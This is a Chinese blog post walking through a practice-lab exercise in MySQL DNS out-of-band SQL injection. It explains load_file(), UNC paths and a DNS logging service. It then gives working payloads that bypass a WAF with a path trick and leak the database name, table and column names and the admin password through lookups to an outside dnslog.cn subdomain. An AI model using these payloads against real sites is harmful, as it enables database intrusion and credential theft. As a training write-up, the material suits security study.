17、注入篇--DNS注入(MySQL)

最新推荐文章于 2022-10-09 11:42:07 发布
最新推荐文章于 2022-10-09 11:42:07 发布
阅读量829 收藏 6
点赞数
分类专栏: WEB安全 文章标签: DNS DNS注入 SQL注入 UNC
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42248871/article/details/115580676
版权

DNS注入

DNS注入也称DNS带外注入、DNSLog注入

DNS

​ DNS(Domain Name System)域名系统,将域名与IP地址相互映射的一个分布式数据库

DNS注入核心是 将盲注变为显错注入

DNS-log

​ DNS服务器的解析记录

注入基础

1、load_file() 读取文件的函数

​ 读取文件并返回文件内容为字符串

​ 要使用此函数文件必须位于主服务器上,必须指定完整路径的文件,而且必须有file权限

​ 该文件所有字节可读,但文件内容必须小于max_allower_packet(限制server接收的数据包大小函数,默认1MB)

​ 如果该文件不存在或无法读取,因为前面的条件之一不满足,函数返回NULL1

​ load_file() 是数据库函数

​ 该功能不是默认开启的,需要在MySQL配置文件加一句:secure_file_priv=

2、UNC路径

​ UNC(Universal Naming Convention)

​ 通用命名规则,也称通用命名规范、通用命名约定

​ UNC路径:

  • 格式:\\servername\sharename (servername–服务器名;sharename共享资源的名称)

  • 目录或文件的UNC名称可以包括共享名称下的目录路径,格式为:\\servername\sharename\directory\filename

  • unc共享就是指网络硬盘的共享

  • UNC路径也可以这样写:

    //servername/sharename [ 建议这样写 ]

DNS-LOG平台:http://www.dnslog.cn/ 可以记录 是否有人访问了该域名,并且记录域名是什么

3、concat() 字符串连接函数

DNS注入缺陷

  1. 目标必须有网络
  2. Windows机器较为常见

注意:

  • index.php/1.txt?id=1
  • 当1.txt不存在时,就会检测上一级 文件是否存在
  • 如果上一级文件存在,就会把id=1传参给index.php

靶场

1、进入靶场,看到源码,可以使用id进行传值
在这里插入图片描述
在这里插入图片描述

2、使用?id=1 and 1=1 有WAF
在这里插入图片描述

3、使用/1.txt?id=1 进行绕过 并分别输入 and 1=1 和 and 1=2 进行探测
绕WAF:
1、绕规则
2、绕检测
3、白名单

and 1=1
在这里插入图片描述

and 1=2
在这里插入图片描述

4、使用DNS注入,用load_file()函数构造payload 爆出数据名名:

http://xxx/index3.php/1.txt?id=1 and (select load_file(concat(‘//‘,database(),’.h3uk2s.dnslog.cn/abc’)))

在这里插入图片描述

5、构造payload 爆出当前数据库下的表名:

爆出第一个表名 admin

http://xxxx/index3.php/1.txt?id=1 and (select load_file(concat(‘//‘,(select table_name from 
information_schema.tables where table_schema=database() limit 0,1),’.h3uk2s.dnslog.cn/abc’)))

注意:.h3uk2s.dnslog.cn/abc 中的abc存不存在 不重要
在这里插入图片描述

爆出第二条表名 news
在这里插入图片描述

爆出第三条表名时 无反应
在这里插入图片描述

故判断 只有两张表 admin news

6、构造payload爆出admin表下的字段名
爆出第一个字段名id

http://xxxx/index3.php/1.txt?id=1 and (select load_file(concat(‘//‘,
(select column_name from information_schema.columns where table_schema=database() and table_name=’admin’ 
limit 0,1),’.h3uk2s.dnslog.cn/abc’)))

在这里插入图片描述

爆出第二个字段名 limit 1,1 username
在这里插入图片描述

爆出第三个字段名limit 2,1 password
在这里插入图片描述

爆出第四个字段名时 limit 3,1 无反应
故判断 admin表下总共3个字段 id、username、password

7、flag可能在password字段中,所以构造payload 爆出password字段中的信息
爆出第一条信息

http://xxxx/index3.php/1.txt?id=1 and (select load_file(concat(‘//‘,
(select password from admin limit 0,1),’.h3uk2s.dnslog.cn/abc’)))

在这里插入图片描述

使用limit 1,1 没有反应
在这里插入图片描述

故判断只有一条信息
8、得到flag,通关

小白学安全
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入攻击与防御
10-04
SQL注入是Internet上最危险、最有名的安全漏洞之一,本书是目前唯一一本专门致力于讲解SQL威胁的图书。本书作者均是专门研究SQL注入的安全专家,他们集众家之长,对应用程序的基本编码和升级维护进行全面跟踪,详细...
mysql注入---DNSLOG注入
nini_boom的博客
07-21 559
不一定学习进度速度快,就代表掌控的东西就多。学习的目标在于对于理解的知识深度和广度,速度快会有很多时间学习广度的东西,但在有限广度的情况下,理解的深度才是更重要的,所以在这种情况下,不要在意学习的进度,把握住学习的节奏,向更深处理解。扎下深根的竹子,在疯狂生长的时候才有更多的后备力量。 0x01 DNSLOG注入 当我们遇到了盲注、延时注入时,页面没有具体的返回。 但是盲注、延时注入需要进行大...
MySQL注入-Dns_log注入
m0_51313985的博客
05-18 266
在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被Ban 所以可以将select到的数据发送给一个url,利用dns解析 产生的记录日志来查看数据。 Dns-log =>DNS域名解析协议=>将域名转化为IP log=>日志(记录的东西) Dns的日志 外带数据(oob)–>这里是一个延时盲注 我让数据库去访问某个网站
MYSQL--Dns注入
qq_68233961的博客
08-07 1064
MYSQL--Dns注入
封神台MYSQL 注入 - Dns注入
qq_40941912的博客
10-05 1133
一、原理 DNSLOG的使用场景: 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被ban。 所以可以将select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据。 LOAD_FILE()读取文件的函数 读取文件并返回文件内容为字符串。要使用此函数,文件必须位于服务器主机上,必须指定完整路径的文件,而且必须有FILE权限。
Mysql注入——DNS注入
m0_55854679的博客
02-17 2006
DNSlog【解决繁琐的盲注】介绍 DNS => 域名解析 LOG => 日志 dns-log => 域名解析日志【记录别人来查询域名和ip的对应】 DNSlog使用场景 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被ban,所以可以将select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据。 DNS
SQL注入攻击与防御(安全技术经典译丛)
02-19
本书作者均是专门研究SQL注入的安全专家,他们集众家之长,对应用程序的基本编码和升级维护进行全面跟踪,详细讲解可能引发SQL注入的行为以及攻击者的利用要素,并结合长期实践经验提出了相应的解决方案。...
基于PHP主机域名管理器的毕业设计,使用MySQL数据库存储数据,采用PDO方式进行数据库访问 Bootstrap框架DNS管理
04-13
- DNS管理:支持DNS记录的添加、删除、修改、查询等功能,支持多种记录类型; - 域名解析:支持域名的解析,可以根据需要进行域名解析的相关操作; - 域名监控:支持域名的监控,可以实时监控域名的状态,及时发现...
EasyHost虚拟主机管理 v3.0.rar
07-05
※ 支持域名实时管理功能,如:修改域名联系人、修改DNS服务器、域名解析、修改域名密码、域名证书、域名续费等。 ※ 自定义域名注册接口功能。您可以设置不同的域名后缀使用不同的注册接口注册,且不影响已开通...
黑帽渗透web安全基础.txt
06-25
76.Sql注入利用DNS注入.mp4 77.学员搭建环境.mp4 78.其他数据库注入.mp4 7.文件包含读取代码执行与命令执行 79.文件包含.mp4 80.文件包含修补+上传修补.mp4 81.文件读取.mp4 82.学员利用文件包含拿webshell.mp4 83....
mysql注入dns注入
seek_2022的博客
05-03 1932
文章目录一、DNS-LOG使用(域名解析日志)(一)DNS简介(二)LOG日志是怎么产生的?(三)DNS-LOG在渗透测试中的应用二、DNS注入相关知识回顾(一)load_file() 读取文件(二)UNC路径(三)绕靶场WAF三、DNS注入靶场实战(一)判断SQL注入(一)绕靶场WAF(二)查询库名(三)查询表名(四)查询字段名(五)查询并提交flag四、小结 一、DNS-LOG使用(域名解析日志) (一)DNS简介 DNS(域名解析)是把域名指向网站空间IP,让人们通过注册的域名可以方便地访问到网站的一
写bat脚本双击执行
qq_35911118的博客
04-08 2556
@echo off           不显示后续命令行及当前命令行 dir c:*.* >a.txt       将c盘文件列表写入a.txt call c:\ucdos\ucdos.bat    调用ucdos echo 你好            显示"你好" pause              暂停,等待按键继续 rem 准备运行wps         注释:准备运行wps cd ucdos            进入ucdos目录 wps               运行wps @echo
DNS外带注入
weixin_52501704的博客
10-09 1411
DNS外带注入
mysql-dnslog注入
Adminxe的博客
05-05 1818
@Adminxe http://ceye.io/ //dnslog注入平台 dnslog原理简介: 简单理解就是在利用注入漏洞的时候,页面无回显,无法直接获得回显信息的情况下,目标可以发起DNS请求,这时就可以尝试通过DNSlog注入的方式把想获得的数据外带出来。 对于SQL盲注,我们可以通过布尔或者时间盲注获取内容,但是整个过程效率低,需要发送很多的请求进行判断,容易触发安全设...
数据库注入学习笔记2---MySQL注入DNS注入
qq_41759633的博客
08-07 252
引:DNS注入并不是对DNS服务器进行注入,而是利用DNS解析的时候会留下的有用的日志,简称:DNS log注入。 条件:有SQL盲注(或时间)注入的站点,可是用sqlmap跑需要频繁请求,最后导致ip被ban。 发现疑似命令注入的洞,但是目标站点不显示,无法确认是不是有漏洞 目标不让信息显示出来,如能发送请求,那么就可以尝试咱这个办法----用DNS log来获取回显(一般为root权限) 首先...
mysql dnslog_mysql-dnslog注入
weixin_39836751的博客
01-19 218
@Adminxednslog原理简介:简单理解就是在利用注入漏洞的时候,页面无回显,无法直接获得回显信息的情况下,目标可以发起DNS请求,这时就可以尝试通过DNSlog注入的方式把想获得的数据外带出来。对于SQL盲注,我们可以通过布尔或者时间盲注获取内容,但是整个过程效率低,需要发送很多的请求进行判断,容易触发安全设备的防护,Dnslog盲注可以减少发送的请求,直接回显数据实现注入mysql下的...
mysql dns 注入_DNSlog应用
weixin_36296215的博客
01-27 195
————背景说明————在做渗透的时候,有一些漏洞发现无回显的,比如sql注入,一般当我们拿到一个无回显的注入,那么我们往往会采用盲注,使用二分法不断猜测字符等方式来取信息,不过这样的方式耗时又费力,而且频繁地测试容易被目标网站ban掉。那么面对盲注,或者是其他漏洞的盲打,有没有哪种方法,可以快速地获取我们需要的信息呢,答案是有的,即本主要说的,利用DNS快速获取数据,官方地讲即DNSlog。这...
DNSlog外带数据注入
C_LCH_2000的博客
08-04 1382
盲注代替 DNS log即DNS日志,域名解析的记录。
sudo systemd-resolve --set-dns添加多个dns
最新发布
05-20
可以通过在命令中多次使用 `--set-dns` 参数来添加多个 DNS 服务器。例如,假设你要添加两个 DNS 服务器 8.8.8.8 和 8.8.4.4,可以使用以下命令: ``` sudo systemd-resolve --set-dns 8.8.8.8 --set-dns 8.8.4.4 `...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值